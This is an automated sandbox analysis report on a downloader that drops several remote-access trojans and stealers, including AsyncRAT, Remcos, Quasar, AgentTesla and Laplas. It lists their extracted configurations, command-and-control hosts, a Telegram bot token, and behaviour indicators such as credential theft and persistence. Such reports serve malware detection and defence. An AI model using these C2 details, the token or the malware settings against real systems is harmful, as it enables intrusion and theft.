agenttesla | 188e97ba18d7394cb3949e66c8aeb062e3ea8675371d0ee2b5126b52366530ae

max time kernel
60s
max time network
369s
platform
windows10-1703_x64
resource
win10-20230220-en
resource tags

arch:x64arch:x86image:win10-20230220-enlocale:en-usos:windows10-1703-x64system
submitted
13-06-2023 15:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a.exe
Size

5KB
MD5

8ce1f6882edc51f701bbe648e40dd133
SHA1

496b3df4657e9d11df14a8ad267061d97249b511
SHA256

188e97ba18d7394cb3949e66c8aeb062e3ea8675371d0ee2b5126b52366530ae
SHA512

5826ea307fa12db5a8005fae8758314c0810e956ead3504fda7cadaccdbe737d609dfdfdc51996ab2eb350eae20398f8fbb97b16aa01f2af373c1ba20767d7d6
SSDEEP

48:6jtGAK8lb9ivcfaFSfkQLJhyPFlL8thCb/IExQpwOulavTqXSfbNtm:OI0iUaakQqDgtmQpmsvNzNt

Malware Config

Extracted

Family

asyncrat

Version

1.0.7

Botnet

Default

192.168.175.1:1800

Mutex

DcRatMutex_qwqdanchun

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Extracted

Family

remcos

Botnet

Ares

nov231122.con-ip.com:7476

Attributes

audio_folder
MicRecords
audio_path
%AppData%
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
Windowsecurity.exe
copy_folder
Security Windows
delete_file
true
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Remcos-L3UAVE
screenshot_crypt
false
screenshot_flag
true
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
true
take_screenshot_time
5

Extracted

Family

quasar

Version

1.4.0

Botnet

newcrypt

103.136.199.131:4782

158.247.227.231:4782

Mutex

973aa178-3f17-48ed-b33e-52dd11425768

Attributes

encryption_key
3E9E141AD83C5BD6CE91880C0E256E15401EC674
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Google Chrome Updater
subdirectory
SubDir

Extracted

Family

remcos

Version

4.6.0 Light

Botnet

RemoteHost

127.0.0.1:1800

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-C9JE9X
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
startup_value
Remcos
take_screenshot_option
false
take_screenshot_time
5

Extracted

Family

remcos

Botnet

Layouts

datbuggy.servepics.com:58003

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-7OBYTV
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Extracted

Family

agenttesla

https://api.telegram.org/bot5954474519:AAEGnfW1mRvGRxq-zIAvwJfpKEbhLLiqVaM/

Extracted

Family

quasar

Version

1.4.0

Botnet

hplus20230325

103.136.199.131:4782

158.247.227.231:4782

Mutex

17eb206f-a56e-4361-a18e-7ca16f3b99cc

Attributes

encryption_key
3E9E141AD83C5BD6CE91880C0E256E15401EC674
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Google Chrome Updater
subdirectory
SubDir

Extracted

Family

laplas

http://45.159.189.105

Attributes

api_key
ab77c1513d42148558312d676282a204d8aa055051d315af2056241c7f79c6f4

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat
Laplas Clipper
Laplas is a crypto wallet stealer with three variants written in Golang, C#, and C++.
stealer clipper laplas
Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 2 IoCs

resource	yara_rule
behavioral1/memory/4376-153-0x0000000000400000-0x0000000000484000-memory.dmp	family_quasar
behavioral1/memory/4372-545-0x0000000000400000-0x0000000000484000-memory.dmp	family_quasar

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

resource	yara_rule
behavioral1/files/0x000600000001af0d-2800.dat	family_redline

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
WarzoneRat, AveMaria
WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.
rat infostealer warzonerat

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral1/memory/3968-130-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat

Downloads MZ/PE file

Modifies Windows Firewall 1 TTPs 1 IoCs

evasion

Modify Existing Service

T1031

pid	Process
5780	netsh.exe

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Executes dropped EXE 37 IoCs

pid	Process
2080	cleanmgr.exe
4244	c15.exe
3124	Remc.exe
4824	WD.exe
4364	dai.exe
3672	31.exe
2748	c.exe
3324	d.exe
664	dd.exe
236	c6.exe
2880	C5.exe
3140	dcr.exe
4780	cleanmgrs.exe
208	cleanmgrs.exe
1884	emmy.exe
216	sechussanzx.exe
3700	ella.exe
3816	alex.exe
4696	Play.exe
4676	bz.exe
3364	cleanpc.exe
5288	s.exe
5480	photo912.exe
5556	Conhost.exe
5616	v2319358.exe
5672	schtasks.exe
5740	a5848190.exe
5248	ai%E8%BF%9B%E7%A8%8B%E5%AE%88%E6%8A%A4.exe
5704	obins.exe
2148	ss41.exe
5216	2a344302.exe
5348	ieinstal.exe
3912	f0699091.exe
3996	oneetx.exe
5796	b8758941.exe
5852	sechussanzx.exe
5124	m5395202.exe

Loads dropped DLL 2 IoCs

pid	Process
4780	cleanmgrs.exe
3364	cleanpc.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Accesses Microsoft Outlook profiles 1 TTPs 9 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegSvcs.exe
Key opened	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	sechussanzx.exe
Key opened	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	sechussanzx.exe
Key opened	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegSvcs.exe
Key opened	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegSvcs.exe
Key opened	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	cleanmgrs.exe
Key opened	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	cleanmgrs.exe
Key opened	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	cleanmgrs.exe
Key opened	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	sechussanzx.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 9 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	Conhost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	Conhost.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	v2319358.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""	v2319358.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	schtasks.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\""	schtasks.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Software\Microsoft\Windows\CurrentVersion\Run\sOFvE = "C:\\Users\\Admin\\AppData\\Roaming\\sOFvE\\sOFvE.exe"	cleanmgrs.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	photo912.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	photo912.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 5 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
43	api.ipify.org
128	api.ipify.org
129	api.ipify.org
210	api.ipify.org
42	api.ipify.org

Suspicious use of SetThreadContext 13 IoCs

description	pid	Process	procid_target
PID 4244 set thread context of 3968	4244	c15.exe	69
PID 4824 set thread context of 4376	4824	WD.exe	75
PID 2748 set thread context of 3440	2748	c.exe	84
PID 3324 set thread context of 1492	3324	d.exe	89
PID 2880 set thread context of 4056	2880	C5.exe	100
PID 3140 set thread context of 1220	3140	dcr.exe	103
PID 4780 set thread context of 208	4780	cleanmgrs.exe	106
PID 4364 set thread context of 4372	4364	dai.exe	111
PID 3672 set thread context of 4864	3672	31.exe	113
PID 236 set thread context of 3368	236	c6.exe	116
PID 4696 set thread context of 1676	4696	Play.exe	118
PID 216 set thread context of 5852	216	sc.exe	146
PID 5124 set thread context of 1840	5124	m5395202.exe	159

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\resources\0409\Skrivepulten\Laxity\Scoringernes\Bettas.Alp	cleanpc.exe

Launches sc.exe 10 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
216	sc.exe
5700	sc.exe
3768	sc.exe
668	sc.exe
5780	sc.exe
5604	sc.exe
3744	sc.exe
6052	sc.exe
1852	sc.exe
1744	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 17 IoCs

pid	pid_target	Process	procid_target
4812	4244	WerFault.exe	68
2088	3324	WerFault.exe	86
2256	2880	WerFault.exe	98
2600	3140	WerFault.exe	101
1748	4364	WerFault.exe	76
2524	5124	WerFault.exe	158
3584	3748	WerFault.exe	165
5332	3748	WerFault.exe	165
1196	3748	WerFault.exe	165
4292	3748	WerFault.exe	165
3640	3748	WerFault.exe	165
3228	3748	WerFault.exe	165
5552	3748	WerFault.exe	165
4900	3748	WerFault.exe	165
5044	3748	WerFault.exe	165
3508	5812	WerFault.exe	199
2736	2528	WerFault.exe	342

NSIS installer 4 IoCs

installer

resource	yara_rule
behavioral1/files/0x000b00000001a23d-775.dat	nsis_installer_1
behavioral1/files/0x000b00000001a23d-775.dat	nsis_installer_2
behavioral1/files/0x000b00000001a23d-778.dat	nsis_installer_1
behavioral1/files/0x000b00000001a23d-778.dat	nsis_installer_2

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	2a344302.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	s.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	s.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	s.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	2a344302.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	2a344302.exe

Creates scheduled task(s) 1 TTPs 5 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
4408	schtasks.exe
5700	schtasks.exe
5672	schtasks.exe
5560	schtasks.exe
5040	schtasks.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
5200	WMIC.exe

GoLang User-Agent 1 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	160	Go-http-client/1.1

Kills process with taskkill 2 IoCs

evasion

pid	Process
6024	taskkill.exe
1316	taskkill.exe

Modifies registry class 44 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	Process not Found
Set value (data)	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\0\MRUListEx = 0000000001000000ffffffff	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0	Process not Found
Set value (data)	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\0\MRUListEx = 00000000ffffffff	Process not Found
Set value (data)	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\0\0\MRUListEx = ffffffff	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\KnownFolderDerivedFolderType = "{57807898-8C4F-4462-BB63-71042380B109}"	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}"	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	Process not Found
Set value (data)	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\0\0 = 4400310000000000cd56277910006100340009000400efbecd561679cd5627792e00000011a50100000005000000000000000000000000000000a8f8d0006100000010000000	Process not Found
Set value (data)	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\0\MRUListEx = 0100000000000000ffffffff	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	Process not Found
Set value (data)	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000007800000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	Process not Found
Set value (data)	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\0\1 = 92003100000000005456829810004336453231447e3100007a0009000400efbe54568298545682982e00000035ff0000000007000000000000000000000000000000719d5400630036006500320031006400340066002d0039003600330032002d0034003300640036002d0061006100370035002d00380061006500620063003900620031003100340065006200000018000000	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\0\1\NodeSlot = "4"	Process not Found
Set value (data)	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\0\1\MRUListEx = ffffffff	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\0\0\NodeSlot = "3"	Process not Found
Set value (data)	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	Process not Found
Set value (data)	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\0	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\0\1	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193"	Process not Found
Set value (data)	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\0\0	Process not Found
Set value (data)	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\KnownFolderDerivedFolderType = "{57807898-8C4F-4462-BB63-71042380B109}"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\SniffedFolderType = "Generic"	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1	Process not Found
Set value (data)	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0	Process not Found

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
5536	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
5092	powershell.exe
5092	powershell.exe
5092	powershell.exe
4900	WerFault.exe
4900	WerFault.exe
1148	powershell.exe
1148	powershell.exe
4900	WerFault.exe
5092	powershell.exe
1148	powershell.exe
4900	WerFault.exe
1148	powershell.exe
1816	Conhost.exe
1816	Conhost.exe
1816	Conhost.exe
1816	Conhost.exe
2200	powershell.exe
2200	powershell.exe
5288	s.exe
5288	s.exe
208	cleanmgrs.exe
208	cleanmgrs.exe
208	cleanmgrs.exe
2200	powershell.exe
2200	powershell.exe
2920	Process not Found
2920	Process not Found
2920	Process not Found
2920	Process not Found
2920	Process not Found
2920	Process not Found
2920	Process not Found
2920	Process not Found
2920	Process not Found
2920	Process not Found
2920	Process not Found
2920	Process not Found
2920	Process not Found
2920	Process not Found
2920	Process not Found
2920	Process not Found
2920	Process not Found
2920	Process not Found
2920	Process not Found
2920	Process not Found
2920	Process not Found
2920	Process not Found
2920	Process not Found
2920	Process not Found
2920	Process not Found
2920	Process not Found
2920	Process not Found
2920	Process not Found
2920	Process not Found
2920	Process not Found
2920	Process not Found
2920	Process not Found
2920	Process not Found
2920	Process not Found
2920	Process not Found
2920	Process not Found
2920	Process not Found
2920	Process not Found
2920	Process not Found

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
3124	Remc.exe
2920	Process not Found

Suspicious behavior: MapViewOfSection 3 IoCs

pid	Process
4780	cleanmgrs.exe
5288	s.exe
5216	2a344302.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2292	a.exe
Token: 33	3008	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	3008	AUDIODG.EXE
Token: SeDebugPrivilege	4376	RegSvcs.exe
Token: SeDebugPrivilege	5092	powershell.exe
Token: SeDebugPrivilege	4900	WerFault.exe
Token: SeDebugPrivilege	1148	powershell.exe
Token: SeDebugPrivilege	4056	RegSvcs.exe
Token: SeDebugPrivilege	1816	Conhost.exe
Token: SeDebugPrivilege	208	cleanmgrs.exe
Token: SeDebugPrivilege	4372	RegSvcs.exe
Token: SeDebugPrivilege	4864	RegSvcs.exe
Token: SeDebugPrivilege	2200	powershell.exe
Token: SeShutdownPrivilege	2920	Process not Found
Token: SeCreatePagefilePrivilege	2920	Process not Found
Token: SeShutdownPrivilege	2920	Process not Found
Token: SeCreatePagefilePrivilege	2920	Process not Found
Token: SeShutdownPrivilege	2920	Process not Found
Token: SeCreatePagefilePrivilege	2920	Process not Found
Token: SeShutdownPrivilege	2920	Process not Found
Token: SeCreatePagefilePrivilege	2920	Process not Found
Token: SeShutdownPrivilege	2920	Process not Found
Token: SeCreatePagefilePrivilege	2920	Process not Found
Token: SeShutdownPrivilege	2920	Process not Found
Token: SeCreatePagefilePrivilege	2920	Process not Found
Token: SeShutdownPrivilege	2920	Process not Found
Token: SeCreatePagefilePrivilege	2920	Process not Found
Token: SeShutdownPrivilege	2920	Process not Found
Token: SeCreatePagefilePrivilege	2920	Process not Found
Token: SeShutdownPrivilege	2920	Process not Found
Token: SeCreatePagefilePrivilege	2920	Process not Found
Token: SeShutdownPrivilege	2920	Process not Found
Token: SeCreatePagefilePrivilege	2920	Process not Found
Token: SeShutdownPrivilege	2920	Process not Found
Token: SeCreatePagefilePrivilege	2920	Process not Found
Token: SeShutdownPrivilege	2920	Process not Found
Token: SeCreatePagefilePrivilege	2920	Process not Found
Token: SeShutdownPrivilege	2920	Process not Found
Token: SeCreatePagefilePrivilege	2920	Process not Found
Token: SeShutdownPrivilege	2920	Process not Found
Token: SeCreatePagefilePrivilege	2920	Process not Found
Token: SeShutdownPrivilege	2920	Process not Found
Token: SeCreatePagefilePrivilege	2920	Process not Found
Token: SeShutdownPrivilege	2920	Process not Found
Token: SeCreatePagefilePrivilege	2920	Process not Found
Token: SeShutdownPrivilege	2920	Process not Found
Token: SeCreatePagefilePrivilege	2920	Process not Found
Token: SeDebugPrivilege	5740	a5848190.exe
Token: SeShutdownPrivilege	2920	Process not Found
Token: SeCreatePagefilePrivilege	2920	Process not Found
Token: SeShutdownPrivilege	2920	Process not Found
Token: SeCreatePagefilePrivilege	2920	Process not Found
Token: SeShutdownPrivilege	2920	Process not Found
Token: SeCreatePagefilePrivilege	2920	Process not Found
Token: SeShutdownPrivilege	2920	Process not Found
Token: SeCreatePagefilePrivilege	2920	Process not Found
Token: SeShutdownPrivilege	2920	Process not Found
Token: SeCreatePagefilePrivilege	2920	Process not Found
